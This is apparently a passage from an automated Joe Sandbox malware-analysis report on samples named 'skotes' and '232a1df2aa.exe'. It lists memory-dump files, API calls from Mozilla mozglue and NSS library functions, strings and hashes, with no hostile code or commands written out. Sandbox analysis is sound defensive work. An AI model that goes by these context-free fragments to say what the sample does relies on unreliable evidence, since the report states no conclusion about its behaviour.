Associated: 00000002.00000002.1805837959.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805862352.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805882030.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805906340.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805924417.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805945795.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805965093.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: 0d3195f238bd8c91d2ab648d7e33f6a911983e8bc3f669471671377f68c2db99
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: 3EB123329442959FDB11CF28C8817EEBFE5EF45340F6481FAE855EB242D6349D82CBA0

Function 00AFBB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00AFBBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 00AFBBE4
_xtime_get.LIBCPMT ref: 00AFBC07
__Xtime_diff_to_millis2.LIBCPMT ref: 00AFBC13

Memory Dump Source

Source File: 00000002.00000002.1804750908.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000002.00000002.1804730516.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804750908.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804818038.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804836483.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804856699.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804961703.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804980301.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805002014.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805025149.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805087045.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805109547.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805128420.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805148359.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805167283.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805186865.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805204810.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805224345.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805246673.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805265791.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805288485.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805306702.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805323464.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805341734.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805361969.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805379759.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805400127.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805421128.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805440417.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805459158.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805481482.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805501727.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805522435.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805541280.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805563809.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805581784.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805602619.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805620329.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805642101.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805661314.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805679555.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805700959.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805719543.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805797397.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805817094.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805837959.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805862352.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805882030.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805906340.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805924417.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805945795.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805965093.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: ff68634883f0a02a67603dc3c2f0beab2cdb25a3618d9dc32f09810815ea204f
Instruction ID: 5e34e662ad6db96ca350af3ee4df3777909af99cc3f59da78f8333fa1bf25c39
Opcode Fuzzy Hash: ff68634883f0a02a67603dc3c2f0beab2cdb25a3618d9dc32f09810815ea204f
Instruction Fuzzy Hash: 7E212F75A0021DAFDF00EFE5DE819BEB7B9EF08724F500419FA01A7251DB309D019BA0

Analysis Process: 232a1df2aa.exePID: 3300, Parent PID: 6720COMMON

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15.7%
Total number of Nodes:	108
Total number of Limit Nodes:	12

Executed Functions

Function 6D3E35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6D46F688,00001000), ref: 6D3E35D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6D3E35E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6D3E35FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6D3E363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6D3E369F
__aulldiv.LIBCMT ref: 6D3E36E4
QueryPerformanceCounter.KERNEL32(?), ref: 6D3E3773
EnterCriticalSection.KERNEL32(6D46F688), ref: 6D3E377E
LeaveCriticalSection.KERNEL32(6D46F688), ref: 6D3E37BD
QueryPerformanceCounter.KERNEL32(?), ref: 6D3E37C4
EnterCriticalSection.KERNEL32(6D46F688), ref: 6D3E37CB
LeaveCriticalSection.KERNEL32(6D46F688), ref: 6D3E3801
__aulldiv.LIBCMT ref: 6D3E3883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6D3E3902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6D3E3918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6D3E394C

Strings

GenuntelineI, xrefs: 6D3E3639
QPC, xrefs: 6D3E38FC
AuthcAMDenti, xrefs: 6D3E3946
MOZ_TIMESTAMP_MODE, xrefs: 6D3E35DB
GTC, xrefs: 6D3E3912

Memory Dump Source

Source File: 0000000E.00000002.3244134270.000000006D3E1000.00000020.00000001.01000000.0000001D.sdmp, Offset: 6D3E0000, based on PE: true

Associated: 0000000E.00000002.3243921173.000000006D3E0000.00000002.00000001.01000000.0000001D.sdmpDownload File
Associated: 0000000E.00000002.3244758201.000000006D45D000.00000002.00000001.01000000.0000001D.sdmpDownload File
Associated: 0000000E.00000002.3244905794.000000006D46E000.00000004.00000001.01000000.0000001D.sdmpDownload File
Associated: 0000000E.00000002.3245072111.000000006D472000.00000002.00000001.01000000.0000001D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d3e0000_232a1df2aa.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 5ee1d8f5c0ab5d89f5698736d8570209adf2369a1657f200a7d5e3114e7e90e2
Instruction ID: 4a549687d51ec348f71f2a38c6aa602fdc7db4999cfe6e6fdfb0735de009643d
Opcode Fuzzy Hash: 5ee1d8f5c0ab5d89f5698736d8570209adf2369a1657f200a7d5e3114e7e90e2
Instruction Fuzzy Hash: 4AB1A471A093919BDB08EF28C84573A7BF6BB89741F05852EE99AD73A0D770DC01CB91

Function 6D3FC930 Relevance: 7.6, APIs: 5, Instructions: 83
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?), ref: 6D3FC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6D3FC969
GetSystemInfo.KERNEL32(?), ref: 6D3FC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6D3FC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6D3FC9E2

Memory Dump Source

Source File: 0000000E.00000002.3244134270.000000006D3E1000.00000020.00000001.01000000.0000001D.sdmp, Offset: 6D3E0000, based on PE: true

Associated: 0000000E.00000002.3243921173.000000006D3E0000.00000002.00000001.01000000.0000001D.sdmpDownload File
Associated: 0000000E.00000002.3244758201.000000006D45D000.00000002.00000001.01000000.0000001D.sdmpDownload File
Associated: 0000000E.00000002.3244905794.000000006D46E000.00000004.00000001.01000000.0000001D.sdmpDownload File
Associated: 0000000E.00000002.3245072111.000000006D472000.00000002.00000001.01000000.0000001D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d3e0000_232a1df2aa.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 5181a7ddcad3036bab6a0bc0a73ff09b454bf7727a5a7c750df966769bb4e805
Instruction ID: 6d9d37a278647cb241887071c07b59ac0a2551f923c1a5609f6bc8ae12f3d122
Opcode Fuzzy Hash: 5181a7ddcad3036bab6a0bc0a73ff09b454bf7727a5a7c750df966769bb4e805
Instruction Fuzzy Hash: E921C531685258ABDB05AE64DCC5BBF73B9BF86740F50011EFA43E7244EB70AC0187A1

Function 6D3E3060 Relevance: 4.5, APIs: 3, Instructions: 36
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6D3E3095

Part of subcall function 6D3E35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6D46F688,00001000), ref: 6D3E35D5
Part of subcall function 6D3E35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6D3E35E0
Part of subcall function 6D3E35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6D3E35FD
Part of subcall function 6D3E35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6D3E363F
Part of subcall function 6D3E35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6D3E369F
Part of subcall function 6D3E35A0: __aulldiv.LIBCMT ref: 6D3E36E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6D3E309F

Part of subcall function 6D405B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6D4056EE,?,00000001), ref: 6D405B85
Part of subcall function 6D405B50: EnterCriticalSection.KERNEL32(6D46F688,?,?,?,6D4056EE,?,00000001), ref: 6D405B90
Part of subcall function 6D405B50: LeaveCriticalSection.KERNEL32(6D46F688,?,?,?,6D4056EE,?,00000001), ref: 6D405BD8
Part of subcall function 6D405B50: GetTickCount64.KERNEL32 ref: 6D405BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6D3E30BE

Part of subcall function 6D3E30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6D3E3127
Part of subcall function 6D3E30F0: __aulldiv.LIBCMT ref: 6D3E3140

Part of subcall function 6D41AB2A: __onexit.LIBCMT ref: 6D41AB30

Memory Dump Source

Source File: 0000000E.00000002.3244134270.000000006D3E1000.00000020.00000001.01000000.0000001D.sdmp, Offset: 6D3E0000, based on PE: true

Associated: 0000000E.00000002.3243921173.000000006D3E0000.00000002.00000001.01000000.0000001D.sdmpDownload File
Associated: 0000000E.00000002.3244758201.000000006D45D000.00000002.00000001.01000000.0000001D.sdmpDownload File
Associated: 0000000E.00000002.3244905794.000000006D46E000.00000004.00000001.01000000.0000001D.sdmpDownload File
Associated: 0000000E.00000002.3245072111.000000006D472000.00000002.00000001.01000000.0000001D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d3e0000_232a1df2aa.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 734619651179aa335993f2dae5a8a45b4b651a9aba3467d14ae7f15df38f1fde
Instruction ID: 01fb6e173487ec728a81546e8342d2e0e553de8f0594b838ce951a0cdcafe2a8
Opcode Fuzzy Hash: 734619651179aa335993f2dae5a8a45b4b651a9aba3467d14ae7f15df38f1fde
Instruction Fuzzy Hash: 89F0DB22C297C457C610FF34884177673709F6B118F15931AE6C656161FB20A9D583C1

Non-executed Functions

Function 6D613FC0 Relevance: 70.5, APIs: 37, Strings: 3, Instructions: 485stringprocessCOMMON

Download Yara Rule

APIs

malloc.MOZGLUE(00000008), ref: 6D613FD5
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6D613FFE
malloc.MOZGLUE(-00000003), ref: 6D614016
strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,6D64FC62), ref: 6D61404A
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6D61407E
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6D6140A4
memset.VCRUNTIME140(?,0000005C,00000000), ref: 6D6140D7
PR_SetError.NSS3(FFFFE890,00000000), ref: 6D614112
malloc.MOZGLUE(00000000), ref: 6D61411E
__p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 6D61414D
PR_SetError.NSS3(FFFFE890,00000000), ref: 6D614160
free.MOZGLUE(?), ref: 6D61416C
malloc.MOZGLUE(?), ref: 6D6141AB
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NSPR_INHERIT_FDS=,00000011), ref: 6D6141EF
qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,00000004,6D614520), ref: 6D614244
GetEnvironmentStrings.KERNEL32 ref: 6D61424D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D614263
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D614283
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D6142B7
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D6142E4
malloc.MOZGLUE(00000002), ref: 6D6142FA
FreeEnvironmentStringsA.KERNEL32(?), ref: 6D614342
GetStdHandle.KERNEL32(000000F6), ref: 6D6143AB
GetStdHandle.KERNEL32(000000F5), ref: 6D6143B2
GetStdHandle.KERNEL32(000000F4), ref: 6D6143B9
FreeEnvironmentStringsA.KERNEL32(?), ref: 6D614403
PR_SetError.NSS3(FFFFE890,00000000), ref: 6D614410

Part of subcall function 6D5AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D5AC2BF

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6D61445E
CloseHandle.KERNEL32(?), ref: 6D61446B
free.MOZGLUE(?), ref: 6D614482
free.MOZGLUE(00000000), ref: 6D614492
free.MOZGLUE(00000000), ref: 6D6144A4
GetLastError.KERNEL32 ref: 6D6144B2
PR_SetError.NSS3(FFFFE896,00000000), ref: 6D6144BE
free.MOZGLUE(?), ref: 6D6144C7
free.MOZGLUE(00000000), ref: 6D6144D5
free.MOZGLUE(00000000), ref: 6D6144EA

Strings

NSPR_INHERIT_FDS=, xrefs: 6D6141E9
=, xrefs: 6D6144F8
D, xrefs: 6D614396

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: free$Errormallocstrlen$Handle$EnvironmentStringsmemset$Free$CloseCreateLastProcessValue__p__environqsortstrncmpstrpbrk
String ID: =$D$NSPR_INHERIT_FDS=
API String ID: 3116300875-3553733109
Opcode ID: 45fd95d12f5c3e31560cf514394fc9b525d0081449700c47b02fa077ee3889b9
Instruction ID: 2e7bab77f1401c5f4e51d3a7806f4e4c0f867e814a325c4d9f214f07966a5cb7
Opcode Fuzzy Hash: 45fd95d12f5c3e31560cf514394fc9b525d0081449700c47b02fa077ee3889b9
Instruction Fuzzy Hash: 0002C270D083569BEB11CFADCC807BEBBB4AF5E308F154129D85AA7242D7B1A845CB91

Function 6D564840 Relevance: 63.4, APIs: 29, Strings: 7, Instructions: 351memorystringCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6D54601B,?,00000000,?), ref: 6D56486F
PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6D5648A8
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6D5648BE
NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6D5648DE
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6D5648F5
NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6D56490A
PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6D564919
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6D56493F
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D564970
PORT_Alloc_Util.NSS3(00000001), ref: 6D5649A0
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6D5649AD
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D5649D4
NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6D5649F4
NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6D564A10
NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6D564A27
NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6D564A3D
NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6D564A4F
PL_strcasecmp.NSS3(00000000,every), ref: 6D564A6C
PL_strcasecmp.NSS3(00000000,timeout), ref: 6D564A81
free.MOZGLUE(00000000), ref: 6D564AAB
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6D564ABE
PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6D564ADC
free.MOZGLUE(00000000), ref: 6D564B17
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6D564B33

Part of subcall function 6D564120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D56413D
Part of subcall function 6D564120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6D564162
Part of subcall function 6D564120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D56416B
Part of subcall function 6D564120: PL_strncasecmp.NSS3(2BVm,?,00000001), ref: 6D564187
Part of subcall function 6D564120: NSSUTIL_ArgSkipParameter.NSS3(2BVm), ref: 6D5641A0
Part of subcall function 6D564120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D5641B4
Part of subcall function 6D564120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6D5641CC
Part of subcall function 6D564120: NSSUTIL_ArgFetchValue.NSS3(2BVm,?), ref: 6D564203

PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6D564B53
free.MOZGLUE(00000000), ref: 6D564B94
free.MOZGLUE(?), ref: 6D564BA7
free.MOZGLUE(00000000), ref: 6D564BB7
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D564BC8

Strings

rootFlags, xrefs: 6D564AB9, 6D564B2E
askpw, xrefs: 6D564A4A
hasRootCerts, xrefs: 6D564AD6
timeout, xrefs: 6D564A38, 6D564A7B
slotFlags, xrefs: 6D564A22
hasRootTrust, xrefs: 6D564B4D
every, xrefs: 6D564A66

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
API String ID: 3791087267-1256704202
Opcode ID: 382f939936511ec1b1e65fc5f403574b329d6c6236871b6c9fce5db3ef83ba20
Instruction ID: c28928f346becd10b26b4c9eae30f0128908e93bed1a2f3ba767c38294450c9f
Opcode Fuzzy Hash: 382f939936511ec1b1e65fc5f403574b329d6c6236871b6c9fce5db3ef83ba20
Instruction Fuzzy Hash: FBC11670D4C2969FEF09CF68DC60BBE7BB8AF4A308F050829D845A7621E7319910C7B1

Function 6D567C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6D567C33
NSS_OptionGet.NSS3(0000000C,00000000), ref: 6D567C66
CERT_DestroyCertificate.NSS3(00000000), ref: 6D567D1E

Part of subcall function 6D567870: SECOID_FindOID_Util.NSS3(?,?,?,6D5691C5), ref: 6D56788F

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D567D48
PR_SetError.NSS3(FFFFE067,00000000), ref: 6D567D71
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6D567DD3
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D567DE1
PR_SetError.NSS3(FFFFE005,00000000), ref: 6D567DF8
SECKEY_DestroyPublicKey.NSS3(?), ref: 6D567E1A
PR_SetError.NSS3(FFFFE067,00000000), ref: 6D567E58

Part of subcall function 6D567870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D5691C5), ref: 6D5678BB
Part of subcall function 6D567870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6D5691C5), ref: 6D5678FA
Part of subcall function 6D567870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6D5691C5), ref: 6D567930
Part of subcall function 6D567870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6D5691C5), ref: 6D567951
Part of subcall function 6D567870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6D567964
Part of subcall function 6D567870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6D56797A
Part of subcall function 6D567870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6D567988
Part of subcall function 6D567870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6D567998
Part of subcall function 6D567870: free.MOZGLUE(00000000), ref: 6D5679A7
Part of subcall function 6D567870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6D5691C5), ref: 6D5679BB
Part of subcall function 6D567870: PR_GetCurrentThread.NSS3(?,?,?,?,6D5691C5), ref: 6D5679CA

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D567E49
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D567F8C
SECKEY_DestroyPublicKey.NSS3(?), ref: 6D567F98
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D567FBF
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6D567FD9
PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6D568038
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6D568050
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6D568093
SECOID_FindOID_Util.NSS3 ref: 6D567F29

Part of subcall function 6D5607B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6D508298,?,?,?,6D4FFCE5,?), ref: 6D5607BF
Part of subcall function 6D5607B0: PL_HashTableLookup.NSS3(?,?), ref: 6D5607E6
Part of subcall function 6D5607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D56081B
Part of subcall function 6D5607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D560825

SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6D568072
SECOID_FindOID_Util.NSS3 ref: 6D5680F5

